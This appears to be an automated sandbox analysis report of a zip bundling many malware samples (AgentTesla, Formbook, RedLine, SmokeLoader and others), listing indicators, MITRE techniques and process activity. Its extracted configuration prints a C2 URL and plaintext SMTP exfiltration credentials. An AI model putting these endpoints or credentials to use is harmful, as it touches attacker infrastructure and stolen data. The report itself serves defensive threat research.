agenttesla | 8f736d24115f70ad18ed620ec8c29efc805ea00e2ac72bb1e9078186488fa059

Resubmissions

28-10-2023 17:05

231028-vlv2caeb35 10

28-10-2023 17:04

231028-vln8sscd9w 10

28-10-2023 16:52

231028-vdn8tsea66 10

Analysis

max time kernel
169s
max time network
661s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2023 17:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Anti Malware VS Malware Document.zip
Size

118.1MB
MD5

10381c0010548265a31da2da6f1611a3
SHA1

3f188fdca7ce79f014b3efa00b1707fb60664e72
SHA256

8f736d24115f70ad18ed620ec8c29efc805ea00e2ac72bb1e9078186488fa059
SHA512

30925324113e0bc692d38c44196b5fa78c1bdff449d361a011ab5f86ee09299071769691da1200a750a55e182e432907a58ada4c36de83ad60e6e2f2aead5445
SSDEEP

3145728:WcNV0c+BBchhJJnsNmDuzn2dOYIwWDB0tg:WcNqcAuD3gTY6wlg

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

t6tg

Decoy

dwolfgang.com

changeandcourse.com

sonexhospitallimited.com

izeera.com

7m9.lat

fem-studio.com

santocielostore.com

0xinxg7e50de2n7q2z.site

ssongg13026.cfd

promushealth.com

g7bety.com

molinoelvinculo.com

smallthingteamwork.world

zewagripro.shop

adam-automatik.com

raquelaranibar.com

aigeniusink.com

maddirazoki.com

nextino.app

verbenashungary.com

Extracted

Family

loaderbot

http://185.236.76.77/cmd.php

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.greentnd.com
Port:
587
Username:
[email protected]
Password:
xAu^5p6BT2vcelhn
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\a\updates_installer.exe	family_zgrat_v1
behavioral1/memory/216-1031-0x00000000005A0000-0x00000000009E2000-memory.dmp	family_zgrat_v1

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2GL930jl.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Formbook payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/5256-935-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/5544-1134-0x0000000000C20000-0x0000000000C4F000-memory.dmp	formbook
behavioral1/memory/5256-1034-0x0000000000400000-0x000000000042F000-memory.dmp	formbook

LoaderBot executable 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5260-1109-0x0000000000D10000-0x000000000110E000-memory.dmp	loaderbot

Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exe

pid process

10256 netsh.exe
8848 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

pid	process
10256	netsh.exe
8848	netsh.exe

Drops startup file 1 IoCs

Processes:

InstallUtil.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuu5lqsElKhdqA2iK7MFRRNG.bat	InstallUtil.exe

Executes dropped EXE 6 IoCs

Processes:

MRT.exeMRT.exe123.exesalo.exeaudiodgse.exesetup.exe

pid process

4400 MRT.exe
2900 MRT.exe
5372 123.exe
5508 salo.exe
5596 audiodgse.exe
5656 setup.exe
Loads dropped DLL 2 IoCs

Processes:

MRT.exe

pid process

2900 MRT.exe
2900 MRT.exe

pid	process
4400	MRT.exe
2900	MRT.exe
5372	123.exe
5508	salo.exe
5596	audiodgse.exe
5656	setup.exe

pid	process
2900	MRT.exe
2900	MRT.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe	upx
C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe	upx
C:\Users\Admin\Pictures\UioIvCfSFyQqegJt14pRzsdR.exe	upx
behavioral1/memory/5996-852-0x00000000001C0000-0x00000000006E9000-memory.dmp	upx
behavioral1/memory/5648-934-0x00000000004B0000-0x00000000009D9000-memory.dmp	upx
behavioral1/memory/6104-901-0x00000000001C0000-0x00000000006E9000-memory.dmp	upx
behavioral1/memory/5796-1042-0x00000000001C0000-0x00000000006E9000-memory.dmp	upx
behavioral1/memory/4724-1136-0x00000000001C0000-0x00000000006E9000-memory.dmp	upx
C:\Users\Admin\Pictures\BwsBREqAQg2l2ty5AxFHhuGt.exe	upx
C:\Program Files (x86)\TAudioConverter\is-2U4RD.tmp	upx
C:\Users\Admin\Pictures\CHBb1shqSBlJS5Nh2qEPGcLM.exe	upx
C:\Program Files (x86)\TAudioConverter\is-2JPOL.tmp	upx
C:\Users\Admin\Desktop\a\laplas03.exe	upx
C:\Users\Admin\Pictures\CxvqfFDcO0eUjJ0iYugnHmgZ.exe	upx
C:\Users\Admin\Pictures\KjkuOUJdtp2xyngiMDDCdddA.exe	upx
C:\Users\Admin\Pictures\vQ7U5ReDODR5blrj2ZiYP2rQ.exe	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 51.159.66.125

description	ioc
Destination IP	51.159.66.125

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TG5I02RO\s51[1]	vmprotect

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 25 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
542	api.ipify.org
1280	ipinfo.io
1332	api.ipify.org
1643	api.myip.com
192	ipinfo.io
1071	api.ipify.org
1275	api.myip.com
598	ipinfo.io
1649	ipinfo.io
1650	ipinfo.io
581	api.myip.com
599	ipinfo.io
651	api.ipify.org
697	api.ipify.org
1276	api.myip.com
1646	api.myip.com
191	ipinfo.io
239	api.ipify.org
576	api.myip.com
188	api.myip.com
1279	ipinfo.io
1401	api.ipify.org
187	api.myip.com
921	api.ipify.org
241	api.ipify.org

Drops file in System32 directory 7 IoCs

Processes:

MRT.exeWindows-KB890830-V5.118.exeWindows-KB890830-x64-V5.118.exe

description	ioc	process
File created	C:\Windows\system32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MPENGINE.DLL	MRT.exe
File created	C:\Windows\system32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MRT\E71B9E2F-EB6A-40AD-94F1-19CAA0BB032A\MpGearSupport_20231028_173851C3C9FFA6-C4A9-B46A-0363-DA14F82285EC.log	MRT.exe
File opened for modification	C:\Windows\SysWOW64\MRT.exe	Windows-KB890830-V5.118.exe
File created	C:\Windows\SysWOW64\MRT.exe	Windows-KB890830-V5.118.exe
File opened for modification	C:\Windows\system32\MRT.exe	Windows-KB890830-x64-V5.118.exe
File created	C:\Windows\system32\MRT.exe	Windows-KB890830-x64-V5.118.exe
File created	C:\Windows\system32\MRT\119B625F-DB8A-6015-DF85-388BBC6B8D87\MPGEAR.DLL	MRT.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

123.exe

description pid process target process

PID 5372 set thread context of 2876 5372 123.exe InstallUtil.exe
Drops file in Windows directory 1 IoCs

Processes:

MRT.exe

description ioc process

File opened for modification C:\Windows\Debug\mrt.log MRT.exe

description	pid	process	target process
PID 5372 set thread context of 2876	5372	123.exe	InstallUtil.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\mrt.log	MRT.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
6732	sc.exe
2736	sc.exe
7424	sc.exe
9860	sc.exe
2836	sc.exe
8404	sc.exe
6264	sc.exe
9952	sc.exe
8940	sc.exe
9444	sc.exe
1816	sc.exe
3808	sc.exe
388	sc.exe
4880	sc.exe
9012	sc.exe
7272	sc.exe
9508	sc.exe
2028	sc.exe
5872	sc.exe
9776	sc.exe
8136	sc.exe

Program crash 33 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6864	5768	WerFault.exe	AppLaunch.exe
6924	2028	WerFault.exe	xENP8vqplQe4LzPAoh2otWvM.exe
3844	6920	WerFault.exe	nalo.exe
5012	7096	WerFault.exe	cbchr.exe
6720	3812	WerFault.exe	AppLaunch.exe
1088	4556	WerFault.exe	908B.exe
32	6332	WerFault.exe	newumma.exe
3668	5860	WerFault.exe	AppLaunch.exe
2100	4152	WerFault.exe	RegAsm.exe
9924	396	WerFault.exe	WatchDog.exe
2944	7492	WerFault.exe	1F62.exe
8764	5784	WerFault.exe	BwsBREqAQg2l2ty5AxFHhuGt.exe
6356	6372	WerFault.exe	fra.exe
4680	7312	WerFault.exe	newrock.exe
3020	5988	WerFault.exe	2.exe
7604	9032	WerFault.exe	QPJ045SJxVLPJenUEp8HGaTz.exe
3376	5988	WerFault.exe	2.exe
8880	5988	WerFault.exe	2.exe
7888	8832	WerFault.exe	i9k80QWHk1oL2S7469M1Rkq1.exe
10796	9016	WerFault.exe	F3j9Gfk2YVzXd6rr5uHKwGwb.exe
10900	10660	WerFault.exe	pablozx.exe
11088	3988	WerFault.exe	Olfumi.exe
8976	8864	WerFault.exe	undergroundzx.exe
10396	8340	WerFault.exe	amday.exe
7264	9104	WerFault.exe	rengad.exe
8920	8840	WerFault.exe	r0xaGV3YBtyMVWqh3RU0qHXi.exe
9092	2436	WerFault.exe	RegAsm.exe
6920	8296	WerFault.exe	oGVujlW2EARSPLCbdMf4vc3q.exe
7872	8956	WerFault.exe	powershell.exe
7844	2816	WerFault.exe	kung.exe
9348	9868	WerFault.exe	SYntYd7VR7pLtIVrMdHfGQGy.exe
7556	11004	WerFault.exe	HTML.exe
5244	7028	WerFault.exe	HofuCrvlKz4RFojKhnSIs3it.exe

NSIS installer 8 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_1
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_2
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_1
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_2
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_1
C:\Users\Admin\Desktop\a\marikolock2.1.exe	nsis_installer_2
C:\Users\Admin\Pictures\SWgS3klMX7HAQrwLHdNoFHom.exe	nsis_installer_1
C:\Users\Admin\Pictures\SWgS3klMX7HAQrwLHdNoFHom.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Creates scheduled task(s) 1 TTPs 11 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3808	schtasks.exe
5228	schtasks.exe
1436	schtasks.exe
6664	schtasks.exe
2516	schtasks.exe
10640	schtasks.exe
7036	schtasks.exe
528	schtasks.exe
1520	schtasks.exe
8624	schtasks.exe
7948	schtasks.exe

Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

5816 timeout.exe
5036 timeout.exe
8844 timeout.exe
8588 timeout.exe

pid	process
5816	timeout.exe
5036	timeout.exe
8844	timeout.exe
8588	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exe

pid process

9556 ipconfig.exe
9544 ipconfig.exe
712 ipconfig.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3156 taskkill.exe
564 taskkill.exe
6168 taskkill.exe
8252 taskkill.exe
6912 taskkill.exe

pid	process
9556	ipconfig.exe
9544	ipconfig.exe
712	ipconfig.exe

pid	process
3156	taskkill.exe
564	taskkill.exe
6168	taskkill.exe
8252	taskkill.exe
6912	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133429883497871204"	chrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

6852 PING.EXE

pid	process
6852	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Windows-KB890830-V5.118.exeWindows-KB890830-x64-V5.118.exetaskmgr.exeMRT.exechrome.exe

pid	process
2788	Windows-KB890830-V5.118.exe
2788	Windows-KB890830-V5.118.exe
2348	Windows-KB890830-x64-V5.118.exe
2348	Windows-KB890830-x64-V5.118.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
2900	MRT.exe
2900	MRT.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
4936	chrome.exe
4936	chrome.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

4936 chrome.exe
4936 chrome.exe
4936 chrome.exe

pid	process
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskmgr.exeMRT.exechrome.exeNew Text Document.exe

description	pid	process
Token: SeDebugPrivilege	924	taskmgr.exe
Token: SeSystemProfilePrivilege	924	taskmgr.exe
Token: SeCreateGlobalPrivilege	924	taskmgr.exe
Token: SeDebugPrivilege	2900	MRT.exe
Token: SeBackupPrivilege	2900	MRT.exe
Token: SeRestorePrivilege	2900	MRT.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeShutdownPrivilege	4936	chrome.exe
Token: SeCreatePagefilePrivilege	4936	chrome.exe
Token: SeDebugPrivilege	1464	New Text Document.exe
Token: SeShutdownPrivilege	4936	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
924	taskmgr.exe
4936	chrome.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exechrome.exe

pid	process
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
4936	chrome.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe
924	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Windows-KB890830-V5.118.exeWindows-KB890830-x64-V5.118.exechrome.exe

description	pid	process	target process
PID 2788 wrote to memory of 4400	2788	Windows-KB890830-V5.118.exe	MRT.exe
PID 2788 wrote to memory of 4400	2788	Windows-KB890830-V5.118.exe	MRT.exe
PID 2788 wrote to memory of 4400	2788	Windows-KB890830-V5.118.exe	MRT.exe
PID 2348 wrote to memory of 2900	2348	Windows-KB890830-x64-V5.118.exe	MRT.exe
PID 2348 wrote to memory of 2900	2348	Windows-KB890830-x64-V5.118.exe	MRT.exe
PID 4936 wrote to memory of 4072	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4072	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1652	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1744	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 1744	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe
PID 4936 wrote to memory of 4532	4936	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

9944 attrib.exe

pid	process
9944	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Anti Malware VS Malware Document.zip"
1⤵
PID:1088

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3784

C:\Users\Admin\Desktop\Windows-KB890830-V5.118.exe
"C:\Users\Admin\Desktop\Windows-KB890830-V5.118.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\MRT.exe
"C:\Windows\system32\MRT.exe"
2⤵
- Executes dropped EXE
PID:4400

C:\Users\Admin\Desktop\Windows-KB890830-x64-V5.118.exe
"C:\Users\Admin\Desktop\Windows-KB890830-x64-V5.118.exe"
1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2348

C:\Windows\system32\MRT.exe
"C:\Windows\system32\MRT.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
